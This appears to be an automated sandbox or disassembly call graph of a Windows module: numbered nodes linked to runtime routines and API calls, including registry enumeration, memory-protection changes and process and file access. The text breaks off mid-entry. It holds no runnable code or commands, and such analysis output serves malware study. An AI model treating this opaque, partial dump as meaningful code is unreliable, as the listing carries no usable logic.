8755->8757 8759 265b3c0dc1c __std_exception_copy 7 API calls 8756->8759 8758 265b3c0cf0c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 8757->8758 8765 265b3c122ce 8758->8765 8760 265b3c122a0 8759->8760 8761 265b3c0dae0 _invalid_parameter_noinfo 20 API calls 8760->8761 8763 265b3c0ffd9 8761->8763 8762 265b3c0cf60 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 8762->8763 8763->8754 8767 265b3c0fdc8 GetStartupInfoW 8763->8767 8766 265b3c122fd 8765->8766 8778 265b3c12184 8765->8778 8766->8762 8768 265b3c0fe97 8767->8768 8769 265b3c0fdfd 8767->8769 8773 265b3c0feb8 8768->8773 8769->8768 8770 265b3c1227c 24 API calls 8769->8770 8771 265b3c0fe26 8770->8771 8771->8768 8772 265b3c0fe50 GetFileType 8771->8772 8772->8771 8777 265b3c0fed6 8773->8777 8774 265b3c0ff31 GetStdHandle 8776 265b3c0ff44 GetFileType 8774->8776 8774->8777 8775 265b3c0ffa5 8775->8754 8776->8777 8777->8774 8777->8775 8779 265b3c0dc3c _invalid_parameter_noinfo 7 API calls 8778->8779 8784 265b3c121a5 8779->8784 8780 265b3c12207 8781 265b3c0dcb4 __free_lconv_num 7 API calls 8780->8781 8782 265b3c12211 8781->8782 8782->8765 8784->8780 8785 265b3c0fb7c 8784->8785 8790 265b3c0f904 8785->8790 8787 265b3c0fbb2 8788 265b3c0fbd1 InitializeCriticalSectionAndSpinCount 8787->8788 8789 265b3c0fbb7 _invalid_parameter_noinfo 8787->8789 8788->8789 8789->8784 8792 265b3c0f961 __vcrt_InitializeCriticalSectionEx 8790->8792 8795 265b3c0f95c __vcrt_InitializeCriticalSectionEx 8790->8795 8791 265b3c0f991 LoadLibraryExW 8793 265b3c0fa66 8791->8793 8791->8795 8792->8787 8793->8792 8794 265b3c0fa7d FreeLibrary 8793->8794 8794->8792 8795->8791 8795->8792 8796 265b3c0f9f0 LoadLibraryExW 8795->8796 8796->8793 8796->8795 9100 265b3c02b40 9102 265b3c02bb1 9100->9102 9101 265b3c02ef4 9102->9101 9103 265b3c02bdd GetModuleHandleA 9102->9103 9104 265b3c02bef __vcrt_InitializeCriticalSectionEx 9103->9104 9104->9101 9105 265b3c02c28 StrCmpNIW 9104->9105 9105->9101 9109 265b3c02c4d 9105->9109 9106 265b3c019a4 6 API calls 9106->9109 9107 265b3c02e19 lstrlenW 9107->9109 9108 265b3c02d5f lstrlenW 9108->9109 9109->9101 9109->9106 9109->9107 9109->9108 9110 265b3c03858 StrCmpNIW 9109->9110 9111 265b3c01534 StrCmpIW StrCmpW 9109->9111 9110->9109 9111->9109 8797 265b3c0f5c4 GetCommandLineA GetCommandLineW 9616 265b3c0cec4 9617 265b3c0cecc 9616->9617 9618 265b3c0fb7c 4 API calls 9617->9618 9619 265b3c0cefd 9617->9619 9620 265b3c0cef9 9617->9620 9618->9617 9622 265b3c0cf28 9619->9622 9623 265b3c0cf53 9622->9623 9624 265b3c0cf36 DeleteCriticalSection 9623->9624 9625 265b3c0cf57 9623->9625 9624->9623 9625->9620 8081 265b3c02544 8082 265b3c025c3 8081->8082 8083 265b3c02625 GetFileType 8082->8083 8096 265b3c026f4 8082->8096 8084 265b3c02649 8083->8084 8085 265b3c02633 StrCpyW 8083->8085 8097 265b3c01a48 GetFinalPathNameByHandleW 8084->8097 8086 265b3c02658 8085->8086 8089 265b3c02662 8086->8089 8091 265b3c026f9 8086->8091 8088 265b3c03858 StrCmpNIW 8088->8091 8089->8096 8102 265b3c03858 8089->8102 8105 265b3c03058 StrCmpIW 8089->8105 8109 265b3c01cb4 8089->8109 8091->8088 8092 265b3c03058 4 API calls 8091->8092 8093 265b3c01cb4 2 API calls 8091->8093 8091->8096 8092->8091 8093->8091 8098 265b3c01ab1 8097->8098 8099 265b3c01a72 StrCmpNIW 8097->8099 8098->8086 8099->8098 8100 265b3c01a8c lstrlenW 8099->8100 8100->8098 8101 265b3c01a9e StrCpyW 8100->8101 8101->8098 8103 265b3c03865 StrCmpNIW 8102->8103 8104 265b3c0387a 8102->8104 8103->8104 8104->8089 8106 265b3c0308a StrCpyW StrCatW 8105->8106 8107 265b3c030a1 PathCombineW 8105->8107 8108 265b3c030aa 8106->8108 8107->8108 8108->8089 8110 265b3c01ccb 8109->8110 8111 265b3c01cd4 8109->8111 8113 265b3c01534 8110->8113 8111->8089 8114 265b3c01584 8113->8114 8117 265b3c0154e 8113->8117 8114->8111 8115 265b3c01565 StrCmpIW 8115->8117 8116 265b3c0156d StrCmpW 8116->8117 8117->8114 8117->8115 8117->8116 8118 265b3c01ac4 8123 265b3c01630 GetProcessHeap 8118->8123 8120 265b3c01ada Sleep SleepEx 8121 265b3c01ad3 8120->8121 8121->8120 8122 265b3c015a0 StrCmpIW StrCmpW 8121->8122 8122->8121 8124 265b3c01650 _invalid_parameter_noinfo 8123->8124 8168 265b3c01268 GetProcessHeap 8124->8168 8126 265b3c01658 8127 265b3c01268 2 API calls 8126->8127 8128 265b3c01669 8127->8128 8129 265b3c01268 2 API calls 8128->8129 8130 265b3c01672 8129->8130 8131 265b3c01268 2 API calls 8130->8131 8132 265b3c0167b 8131->8132 8133 265b3c01696 RegOpenKeyExW 8132->8133 8134 265b3c016c8 RegOpenKeyExW 8133->8134 8135 265b3c018ae 8133->8135 8136 265b3c01707 RegOpenKeyExW 8134->8136 8137 265b3c016f1 8134->8137 8135->8121 8139 265b3c0172b 8136->8139 8140 265b3c01742 RegOpenKeyExW 8136->8140 8172 265b3c012bc RegQueryInfoKeyW 8137->8172 8183 265b3c0104c RegQueryInfoKeyW 8139->8183 8141 265b3c01766 8140->8141 8142 265b3c0177d RegOpenKeyExW 8140->8142 8145 265b3c012bc 13 API calls 8141->8145 8146 265b3c017b8 RegOpenKeyExW 8142->8146 8147 265b3c017a1 8142->8147 8149 265b3c01773 RegCloseKey 8145->8149 8151 265b3c017dc 8146->8151 8152 265b3c017f3 RegOpenKeyExW 8146->8152 8150 265b3c012bc 13 API calls 8147->8150 8149->8142 8153 265b3c017ae RegCloseKey 8150->8153 8154 265b3c012bc 13 API calls 8151->8154 8155 265b3c01817 8152->8155 8156 265b3c0182e RegOpenKeyExW 8152->8156 8153->8146 8159 265b3c017e9 RegCloseKey 8154->8159 8160 265b3c0104c 5 API calls 8155->8160 8157 265b3c01869 RegOpenKeyExW 8156->8157 8158 265b3c01852 8156->8158 8162 265b3c0188d 8157->8162 8163 265b3c018a4 RegCloseKey 8157->8163 8161 265b3c0104c 5 API calls 8158->8161 8159->8152 8164 265b3c01824 RegCloseKey 8160->8164 8165 265b3c0185f RegCloseKey 8161->8165 8166 265b3c0104c 5 API calls 8162->8166 8163->8135 8164->8156 8165->8157 8167 265b3c0189a RegCloseKey 8166->8167 8167->8163 8189 265b3c16168 8168->8189 8170 265b3c01283 GetProcessHeap 8171 265b3c012ae _invalid_parameter_noinfo 8170->8171 8171->8126 8173 265b3c01327 GetProcessHeap 8172->8173 8174 265b3c0148a RegCloseKey 8172->8174 8180 265b3c0133e _invalid_parameter_noinfo 8173->8180 8174->8136 8175 265b3c01476 GetProcessHeap HeapFree 8175->8174 8176 265b3c01352 RegEnumValueW 8176->8180 8177 265b3c01534 2 API calls 8177->8180 8178 265b3c0141e lstrlenW GetProcessHeap 8178->8180 8179 265b3c013d3 GetProcessHeap 8179->8180 8180->8175 8180->8176 8180->8177 8180->8178 8180->8179 8181 265b3c01443 StrCpyW 8180->8181 8182 265b3c013f3 GetProcessHeap HeapFree 8180->8182 8181->8180 8182->8178 8184 265b3c011b5 RegCloseKey 8183->8184 8186 265b3c010bf _invalid_parameter_noinfo 8183->8186 8184->8140 8185 265b3c010cf RegEnumValueW 8185->8186 8186->8184 8186->8185 8187 265b3c0114e GetProcessHeap 8186->8187 8188 265b3c0116e GetProcessHeap HeapFree 8186->8188 8187->8186 8188->8186 8190 265b3c16177 8189->8190 9898 265b3c05244 9899 265b3c0524a 9898->9899 9900 265b3c0787c 4 API calls 9899->9900 9901 265b3c0528d 9900->9901 9908 265b3c052ae 9901->9908 9910 265b3c03cd0 9901->9910 9904 265b3c05347 9906 265b3c054cd 9904->9906 9904->9908 9914 265b3c07450 9904->9914 9905 265b3c055cb 9906->9905 9907 265b3c05647 VirtualProtect 9906->9907 9907->9908 9909 265b3c05673 GetLastError 9907->9909 9909->9908 9911 265b3c03ced 9910->9911 9913 265b3c03d5c 9911->9913 9920 265b3c03f40 9911->9920 9913->9904 9915 265b3c07497 9914->9915 9945 265b3c07220 9915->9945 9918 265b3c07950 _log10_special 2 API calls 9919 265b3c074c1 9918->9919 9919->9904 9921 265b3c03f87 9920->9921 9922 265b3c03f64 9920->9922 9923 265b3c03fbd 9921->9923 9940 265b3c03b20 9921->9940 9922->9921 9934 265b3c039f0 9922->9934 9926 265b3c03fed 9923->9926 9927 265b3c03b20 2 API calls 9923->9927 9928 265b3c039f0 3 API calls 9926->9928 9932 265b3c04023 9926->9932 9927->9926 9928->9932 9929 265b3c039f0 3 API calls 9930 265b3c0403f 9929->9930 9931 265b3c0405b 9930->9931 9933 265b3c03b20 2 API calls 9930->9933 9931->9913 9932->9929 9932->9930 9933->9931 9939 265b3c03a11 9934->9939 9935 265b3c03a80 9935->9921 9936 265b3c03a66 VirtualQuery 9936->9935 9936->9939 9937 265b3c03a9a VirtualAlloc 9937->9935 9938 265b3c03acb GetLastError 9937->9938 9938->9939 9939->9935 9939->9936 9939->9937 9944 265b3c03b38 9940->9944 9941 265b3c03ba7 9941->9923 9942 265b3c03b8d VirtualQuery 9942->9941 9942->9944 9943 265b3c03bf2 GetLastError 9943->9944 9944->9941 9944->9942 9944->9943 9946 265b3c0723b 9945->9946 9947 265b3c0725f 9946->9947 9948 265b3c07251 SetLastError 9946->9948 9947->9918 9948->9947 9112 265b3c058c9 9113 265b3c058d0 VirtualProtect 9112->9113 9114 265b3c058f9 GetLastError 9113->9114 9115 265b3c057e0 9113->9115 9114->9115 9116 265b3c03ac9 9121 265b3c03a16 9116->9121 9117 265b3c03a80 9118 265b3c03a66 VirtualQuery 9118->9117 9118->9121 9119 265b3c03a9a VirtualAlloc 9119->9117 9120 265b3c03acb GetLastError 9119->9120 9120->9121 9121->9117 9121->9118 9121->9119 9626 265b3c0224c GetProcessIdOfThread GetCurrentProcessId 9627 265b3c0227d 9626->9627 9629 265b3c0231a 9626->9629 9633 265b3c0193c OpenProcess 9627->9633 9631 265b3c0228f CreateFileW 9631->9629 9632 265b3c022d3 WriteFile ReadFile CloseHandle 9631->9632 9632->9629 9634 265b3c01968 IsWow64Process 9633->9634 9635 265b3c01991 9633->9635 9636 265b3c01988 CloseHandle 9634->9636 9637 265b3c0197a 9634->9637 9635->9629 9635->9631 9636->9635 9637->9636 8798 265b3c14f50 8799 265b3c14f88 __GSHandlerCheckCommon 8798->8799 8800 265b3c14fb4 8799->8800 8802 265b3c0a0c0 8799->8802 8803 265b3c08c04 _CallSETranslator 4 API calls 8802->8803 8804 265b3c0a0ea 8803->8804 8805 265b3c08c04 _CallSETranslator 4 API calls 8804->8805 8806 265b3c0a0f7 8805->8806 8807 265b3c08c04 _CallSETranslator 4 API calls 8806->8807 8808 265b3c0a100 8807->8808 8808->8800 9949 265b3c14fd0 9959 265b3c08580 9949->9959 9951 265b3c14ff8 9953 265b3c08c04 _CallSETranslator 4 API calls 9954 265b3c15008 9953->9954 9955 265b3c08c04 _CallSETranslator 4 API calls 9954->9955 9956 265b3c15011 9955->9956 9957 265b3c0cc18 17 API calls 9956->9957 9958 265b3c1501a 9957->9958 9960 265b3c085b0 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 9959->9960 9961 265b3c086b1 9960->9961 9962 265b3c08674 RtlUnwindEx 9960->9962 9961->9951 9961->9953 9962->9960 8809 265b3c07f52 8810 265b3c089a0 __std_exception_copy 20 API calls 8809->8810 8811 265b3c07f7d 8810->8811 8812 265b3c15b51 __scrt_dllmain_exception_filter 9638 265b3c0c654 9639 265b3c0c66d 9638->9639 9652 265b3c0c669 9638->9652 9640 265b3c0f200 38 API calls 9639->9640 9641 265b3c0c672 9640->9641 9653 265b3c0f75c GetEnvironmentStringsW 9641->9653 9644 265b3c0c68b 9669 265b3c0c6c8 9644->9669 9645 265b3c0c67f 9646 265b3c0dcb4 __free_lconv_num 7 API calls 9645->9646 9646->9652 9649 265b3c0dcb4 __free_lconv_num 7 API calls 9650 265b3c0c6b2 9649->9650 9651 265b3c0dcb4 __free_lconv_num 7 API calls 9650->9651 9651->9652 9654 265b3c0c677 9653->9654 9655 265b3c0f78c 9653->9655 9654->9644 9654->9645 9656 265b3c0f7e4 FreeEnvironmentStringsW 9655->9656 9657 265b3c0cf7c 7 API calls 9655->9657 9656->9654 9658 265b3c0f7f7 9657->9658 9659 265b3c0f808 9658->9659 9660 265b3c0f7ff 9658->9660 9663 265b3c0f839 9659->9663 9664 265b3c0f82f 9659->9664 9661 265b3c0dcb4 __free_lconv_num 7 API calls 9660->9661 9662 265b3c0f806 9661->9662 9662->9656 9666 265b3c0dcb4 __free_lconv_num 7 API calls 9663->9666 9665 265b3c0dcb4 __free_lconv_num 7 API calls 9664->9665 9667 265b3c0f837 FreeEnvironmentStringsW 9665->9667 9666->9667 9667->9654 9670 265b3c0c6ed 9669->9670 9671 265b3c0dc3c _invalid_parameter_noinfo 7 API calls 9670->9671 9682 265b3c0c723 9671->9682 9672 265b3c0c72b 9673 265b3c0dcb4 __free_lconv_num 7 API calls 9672->9673 9674 265b3c0c693 9673->9674 9674->9649 9675 265b3c0c79e 9676 265b3c0dcb4 __free_lconv_num 7 API calls 9675->9676 9676->9674 9677 265b3c0dc3c _invalid_parameter_noinfo 7 API calls 9677->9682 9678 265b3c0c78d 9680 265b3c0c7d8 7 API calls 9678->9680 9679 265b3c0cc58 __std_exception_copy 20 API calls 9679->9682 9681 265b3c0c795 9680->9681 9684 265b3c0dcb4 __free_lconv_num 7 API calls 9681->9684 9682->9672 9682->9675 9682->9677 9682->9678 9682->9679 9683 265b3c0c7c3 9682->9683 9685 265b3c0dcb4 __free_lconv_num 7 API calls 9682->9685 9684->9672 9685->9682 9963 265b3c0d1d4 9964 265b3c0d1d9 9963->9964 9965 265b3c0d1ee 9963->9965 9969 265b3c0d1f4 9964->9969 9968 265b3c0dcb4 __free_lconv_num 7 API calls 9968->9965 9970 265b3c0d236 9969->9970 9974 265b3c0d23e 9969->9974 9971 265b3c0dcb4 __free_lconv_num 7 API calls 9970->9971 9971->9974 9972 265b3c0dcb4 __free_lconv_num 7 API calls 9973 265b3c0d24b 9972->9973 9975 265b3c0dcb4 __free_lconv_num 7 API calls 9973->9975 9974->9972 9976 265b3c0d258 9975->9976 9977 265b3c0dcb4 __free_lconv_num 7 API calls 9976->9977 9978 265b3c0d265 9977->9978 9979 265b3c0dcb4 __free_lconv_num 7 API calls 9978->9979 9980 265b3c0d272 9979->9980 9981 265b3c0dcb4 __free_lconv_num 7 API calls 9980->9981 9982 265b3c0d27f 9981->9982 9983 265b3c0dcb4 __free_lconv_num 7 API calls 9982->9983 9984 265b3c0d28c 9983->9984 9985 265b3c0dcb4 __free_lconv_num 7 API calls 9984->9985 9986 265b3c0d299 9985->9986 9987 265b3c0dcb4 __free_lconv_num 7 API calls 9986->9987 9988 265b3c0d2a9 9987->9988 9989 265b3c0dcb4 __free_lconv_num 7 API calls 9988->9989 9990 265b3c0d2b9 9989->9990 9995 265b3c0d0a4 9990->9995 9996 265b3c0cf0c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 9995->9996 9999 265b3c0d0c0 9996->9999 9997 265b3c0d0f0 9998 265b3c0cf60 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 9997->9998 10000 265b3c0d0f8 9998->10000 9999->9997 10001 265b3c0dcb4 __free_lconv_num 7 API calls 9999->10001 10002 265b3c0d01c 10000->10002 10001->9997 10003 265b3c0cf0c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 10002->10003 10004 265b3c0d038 10003->10004 10005 265b3c0d2ec Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 10004->10005 10006 265b3c0d046 10005->10006 10007 265b3c0cf60 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 10006->10007 10008 265b3c0d04e 10007->10008 10008->9968 9122 265b3c15cd8 9125 265b3c0b7f8 9122->9125 9126 265b3c0b812 9125->9126 9128 265b3c0b85f 9125->9128 9127 265b3c08c04 _CallSETranslator 4 API calls 9126->9127 9126->9128 9127->9128 10009 265b3c107d8 10010 265b3c10802 10009->10010 10011 265b3c0dc3c _invalid_parameter_noinfo 7 API calls 10010->10011 10012 265b3c10821 10011->10012 10013 265b3c0dcb4 __free_lconv_num 7 API calls 10012->10013 10014 265b3c1082f 10013->10014 10015 265b3c0dc3c _invalid_parameter_noinfo 7 API calls 10014->10015 10016 265b3c10859 10014->10016 10017 265b3c1084b 10015->10017 10018 265b3c0fb7c 4 API calls 10016->10018 10020 265b3c10862 10016->10020 10019 265b3c0dcb4 __free_lconv_num 7 API calls 10017->10019 10018->10016 10019->10016 8813 265b3c0fd5c 8814 265b3c0fd95 8813->8814 8816 265b3c0fd66 8813->8816 8815 265b3c0fd7b FreeLibrary 8815->8816 8816->8814 8816->8815 10021 265b3c119dc 10022 265b3c11a35 10021->10022 10023 265b3c11a49 10021->10023 10024 265b3c0dc1c __std_exception_copy 7 API calls 10022->10024 10023->10022 10025 265b3c11a4e 10023->10025 10026 265b3c11a3a 10024->10026 10028 265b3c0e724 17 API calls 10025->10028 10029 265b3c11a45 10025->10029 10027 265b3c0dae0 _invalid_parameter_noinfo 20 API calls 10026->10027 10027->10029 10028->10029 8817 265b3c0555d 8819 265b3c05564 8817->8819 8818 265b3c055cb 8819->8818 8820 265b3c05647 VirtualProtect 8819->8820 8821 265b3c05681 8820->8821 8822 265b3c05673 GetLastError 8820->8822 8822->8821 8823 265b3c10160 8826 265b3c10118 8823->8826 8827 265b3c0cf0c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 8826->8827 8828 265b3c10131 8827->8828 8829 265b3c0cf60 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 8828->8829 8830 265b3c10152 8829->8830 9686 265b3c10c60 9689 265b3c10be4 9686->9689 9690 265b3c0cf0c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 9689->9690 9693 265b3c10c02 9690->9693 9691 265b3c10c3b 9692 265b3c0cf60 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 9691->9692 9694 265b3c10c42 9692->9694 9693->9691 9695 265b3c1103c _invalid_parameter_noinfo 7 API calls 9693->9695 9695->9693 9133 265b3c0c0e1 9134 265b3c0cc18 17 API calls 9133->9134 9135 265b3c0c0e6 9134->9135 9136 265b3c0c157 9135->9136 9137 265b3c0c10d GetModuleHandleW 9135->9137 9149 265b3c0bfe4 9136->9149 9137->9136 9143 265b3c0c11a 9137->9143 9140 265b3c0c19a 9143->9136 9145 265b3c0c208 GetModuleHandleExW 9143->9145 9148 265b3c0c23c _invalid_parameter_noinfo __vcrt_InitializeCriticalSectionEx 9145->9148 9146 265b3c0c26a FreeLibrary 9147 265b3c0c271 9146->9147 9147->9136 9148->9146 9148->9147 9150 265b3c0cf0c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 9149->9150 9151 265b3c0c000 9150->9151 9163 265b3c0c01c 9151->9163 9153 265b3c0c009 9154 265b3c0cf60 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 9153->9154 9155 265b3c0c011 9154->9155 9155->9140 9156 265b3c0c1b0 9155->9156 9181 265b3c0c1e4 9156->9181 9158 265b3c0c1bd 9159 265b3c0c1d2 9158->9159 9160 265b3c0c1c1 GetCurrentProcess TerminateProcess 9158->9160 9161 265b3c0c208 2 API calls 9159->9161 9160->9159 9162 265b3c0c1d9 ExitProcess 9161->9162 9164 265b3c0c032 _invalid_parameter_noinfo 9163->9164 9165 265b3c0c095 9163->9165 9164->9165 9167 265b3c0c9fc 9164->9167 9165->9153 9170 265b3c0c8a0 9167->9170 9171 265b3c0cf0c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 9170->9171 9172 265b3c0c8bc 9171->9172 9177 265b3c0c8dc 9172->9177 9175 265b3c0cf60 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 9176 265b3c0c8ce 9175->9176 9176->9165 9178 265b3c0c8c5 9177->9178 9179 265b3c0c90a _invalid_parameter_noinfo 9177->9179 9178->9175 9179->9178 9180 265b3c0dcb4 __free_lconv_num 7 API calls 9179->9180 9180->9178 9184 265b3c0d72c 9181->9184 9183 265b3c0c1ed 9183->9158 9185 265b3c0d73d 9184->9185 9186 265b3c0d74b 9185->9186 9188 265b3c0fac0 9185->9188 9186->9183 9189 265b3c0f904 3 API calls 9188->9189 9190 265b3c0fae8 9189->9190 9190->9186 9696 265b3c15e65 9697 265b3c15e7e 9696->9697 9698 265b3c15e74 9696->9698 9699 265b3c0cf60 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 9698->9699 9699->9697 9700 265b3c0f86c 9701 265b3c0f88e 9700->9701 9704 265b3c0f8ab 9700->9704 9702 265b3c0f89c 9701->9702 9701->9704 9703 265b3c0dc1c __std_exception_copy 7 API calls 9702->9703 9706 265b3c0f8a1 9703->9706 9707 265b3c12064 9704->9707 9708 265b3c12079 9707->9708 9709 265b3c12083 9707->9709 9711 265b3c0cf7c 7 API calls 9708->9711 9710 265b3c12088 9709->9710 9717 265b3c1208f _invalid_parameter_noinfo 9709->9717 9712 265b3c0dcb4 __free_lconv_num 7 API calls 9710->9712 9715 265b3c12081 9711->9715 9712->9715 9713 265b3c12095 9716 265b3c0dc1c __std_exception_copy 7 API calls 9713->9716 9714 265b3c120c2 HeapReAlloc 9714->9715 9714->9717 9715->9706 9716->9715 9717->9713 9717->9714 9718 265b3c0bdcc _invalid_parameter_noinfo 2 API calls 9717->9718 9718->9717 9191 265b3c07aec 9198 265b3c08814 9191->9198 9194 265b3c07af9 9199 265b3c08c20 _CallSETranslator 4 API calls 9198->9199 9200 265b3c07af5 9199->9200 9200->9194 9201 265b3c0cbac 9200->9201 9202 265b3c0d510 __std_exception_copy 7 API calls 9201->9202 9203 265b3c07b02 9202->9203 9203->9194 9204 265b3c08828 9203->9204 9207 265b3c08bbc 9204->9207 9206 265b3c08831 9206->9194 9208 265b3c08bcd 9207->9208 9210 265b3c08be2 __std_exception_copy 9207->9210 9209 265b3c0a370 _CallSETranslator 4 API calls 9208->9209 9209->9210 9210->9206 10030 265b3c087ec 10037 265b3c08d4c 10030->10037 10032 265b3c087f9 10035 265b3c08802 10035->10032 10047 265b3c08d94 10035->10047 10038 265b3c08d54 10037->10038 10040 265b3c08d85 10038->10040 10041 265b3c087f5 10038->10041 10051 265b3c0a3c4 10038->10051 10042 265b3c08d94 __vcrt_uninitialize_locks DeleteCriticalSection 10040->10042 10041->10032 10043 265b3c08ce0 10041->10043 10042->10041 10044 265b3c08cf0 10043->10044 10045 265b3c0a370 _CallSETranslator 4 API calls 10044->10045 10046 265b3c08d09 __vcrt_uninitialize_ptd 10044->10046 10045->10046 10046->10035 10048 265b3c08dbf 10047->10048 10049 265b3c08da2 DeleteCriticalSection 10048->10049 10050 265b3c08dc3 10048->10050 10049->10048 10050->10032 10052 265b3c0a148 __vcrt_InitializeCriticalSectionEx 3 API calls 10051->10052 10053 265b3c0a3fa 10052->10053 10054 265b3c0a40f InitializeCriticalSectionAndSpinCount 10053->10054 10055 265b3c0a404 10053->10055 10054->10055 10055->10038 8831 265b3c0b370 8832 265b3c0b39d __except_validate_context_record 8831->8832 8833 265b3c08c04 _CallSETranslator 4 API calls 8832->8833 8834 265b3c0b3a2 8833->8834 8837 265b3c0b3fc 8834->8837 8839 265b3c0b48a 8834->8839 8847 265b3c0b450 8834->8847 8835 265b3c0b4f8 8835->8847 8872 265b3c0aaf0 8835->8872 8836 265b3c0b477 8860 265b3c09c6c 8836->8860 8837->8836 8845 265b3c0b41e __FrameHandler3::FrameUnwindToEmptyState 8837->8845 8837->8847 8842 265b3c0b4a9 8839->8842 8866 265b3c0a068 8839->8866 8842->8835 8842->8847 8869 265b3c0a07c 8842->8869 8843 265b3c0b5a1 8845->8843 8848 265b3c0b87c 8845->8848 8849 265b3c0a068 Is_bad_exception_allowed 4 API calls 8848->8849 8850 265b3c0b8ab __FrameHandler3::FrameUnwindToEmptyState 8849->8850 8851 265b3c08c04 _CallSETranslator 4 API calls 8850->8851 8858 265b3c0b8c8 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 8851->8858 8852 265b3c0b9bf 8853 265b3c08c04 _CallSETranslator 4 API calls 8852->8853 8854 265b3c0b9c4 8853->8854 8856 265b3c08c04 _CallSETranslator 4 API calls 8854->8856 8857 265b3c0b9cf __FrameHandler3::GetHandlerSearchState 8854->8857 8855 265b3c0a068 LoadLibraryExW LoadLibraryExW FreeLibrary TlsSetValue Is_bad_exception_allowed 8855->8858 8856->8857 8857->8847 8858->8852 8858->8855 8858->8857 8859 265b3c0a090 __FrameHandler3::FrameUnwindToEmptyState 4 API calls 8858->8859 8859->8858 8861 265b3c09c8b __FrameHandler3::FrameUnwindToEmptyState __FrameHandler3::ExecutionInCatch 8860->8861 8926 265b3c09bdc 8861->8926 8864 265b3c0b87c __FrameHandler3::FrameUnwindToEmptyState 4 API calls 8865 265b3c09cc0 8864->8865 8865->8847 8867 265b3c08c04 _CallSETranslator 4 API calls 8866->8867 8868 265b3c0a071 8867->8868 8868->8842 8870 265b3c08c04 _CallSETranslator 4 API calls 8869->8870 8871 265b3c0a085 8870->8871 8871->8835 8876 265b3c0ab51 __FrameHandler3::GetHandlerSearchState 8872->8876 8873 265b3c0afb7 8874 265b3c0af08 8874->8873 8913 265b3c0af06 8874->8913 8971 265b3c0afc0 8874->8971 8875 265b3c0ac36 8875->8874 8916 265b3c0ac6e 8875->8916 8876->8873 8876->8875 8878 265b3c08c04 _CallSETranslator 4 API calls 8876->8878 8877 265b3c08c04 _CallSETranslator 4 API calls 8880 265b3c0af4a 8877->8880 8881 265b3c0ab9d 8878->8881 8880->8873 8884 265b3c07950 _log10_special 2 API calls 8880->8884 8881->8880 8887 265b3c08c04 _CallSETranslator 4 API calls 8881->8887 8882 265b3c0ae56 8890 265b3c0ae78 8882->8890 8882->8913 8964 265b3c09c40 8882->8964 8883 265b3c0ae35 8883->8882 8886 265b3c0a068 Is_bad_exception_allowed 4 API calls 8883->8886 8883->8913 8885 265b3c0af5d 8884->8885 8885->8847 8886->8882 8889 265b3c0abad 8887->8889 8891 265b3c08c04 _CallSETranslator 4 API calls 8889->8891 8892 265b3c0af9a 8890->8892 8893 265b3c0ae8e 8890->8893 8890->8913 8894 265b3c0abb6 8891->8894 8896 265b3c08c04 _CallSETranslator 4 API calls 8892->8896 8895 265b3c0ae99 8893->8895 8898 265b3c0a068 Is_bad_exception_allowed 4 API calls 8893->8898 8930 265b3c0a0a8 8894->8930 8902 265b3c0baa0 4 API calls 8895->8902 8899 265b3c0afa0 8896->8899 8898->8895 8903 265b3c08c04 _CallSETranslator 4 API calls 8899->8903 8900 265b3c0a07c LoadLibraryExW LoadLibraryExW FreeLibrary TlsSetValue 8900->8916 8908 265b3c0aeb0 __FrameHandler3::FrameUnwindToEmptyState 8902->8908 8905 265b3c0afa9 8903->8905 8904 265b3c08c04 _CallSETranslator 4 API calls 8907 265b3c0abf8 8904->8907 8906 265b3c0cc18 17 API calls 8905->8906 8906->8873 8907->8875 8909 265b3c08c04 _CallSETranslator 4 API calls 8907->8909 8908->8913 8968 265b3c09ed4 RtlUnwindEx 8908->8968 8911 265b3c0ac04 8909->8911 8914 265b3c08c04 _CallSETranslator 4 API calls 8911->8914 8913->8877 8915 265b3c0ac0d 8914->8915 8933 265b3c0baa0 8915->8933 8916->8883 8916->8900 8944 265b3c0b230 8916->8944 8958 265b3c0aa1c 8916->8958 8920 265b3c0ac21 8940 265b3c0bb90 8920->8940 8922 265b3c0af94 8923 265b3c0cc18 17 API calls 8922->8923 8923->8892 8924 265b3c0ac29 __CxxCallCatchBlock std::bad_alloc::bad_alloc 8924->8922 8925 265b3c08a58 Concurrency::cancel_current_task 2 API calls 8924->8925 8925->8922 8927 265b3c09c27 8926->8927 8928 265b3c09bfc 8926->8928 8927->8864 8928->8927 8929 265b3c08c04 _CallSETranslator 4 API calls 8928->8929 8929->8928 8931 265b3c08c04 _CallSETranslator 4 API calls 8930->8931 8932 265b3c0a0b6 8931->8932 8932->8873 8932->8904 8934 265b3c0bb87 8933->8934 8936 265b3c0bacb 8933->8936 8935 265b3c0ac1d 8935->8875 8935->8920 8936->8935 8937 265b3c0a07c LoadLibraryExW LoadLibraryExW FreeLibrary TlsSetValue 8936->8937 8938 265b3c0a068 Is_bad_exception_allowed 4 API calls 8936->8938 8939 265b3c0b230 4 API calls 8936->8939 8937->8936 8938->8936 8939->8936 8942 265b3c0bbad Is_bad_exception_allowed 8940->8942 8943 265b3c0bbfd 8940->8943 8941 265b3c0a068 LoadLibraryExW LoadLibraryExW FreeLibrary TlsSetValue Is_bad_exception_allowed 8941->8942 8942->8941 8942->8943 8943->8924 8945 265b3c0b25d 8944->8945 8954 265b3c0b2ec 8944->8954 8946 265b3c0a068 Is_bad_exception_allowed 4 API calls 8945->8946 8947 265b3c0b266 8946->8947 8948 265b3c0a068 Is_bad_exception_allowed 4 API calls 8947->8948 8949 265b3c0b27f 8947->8949 8947->8954 8948->8949 8950 265b3c0b2ab 8949->8950 8951 265b3c0a068 Is_bad_exception_allowed 4 API calls 8949->8951 8949->8954 8952 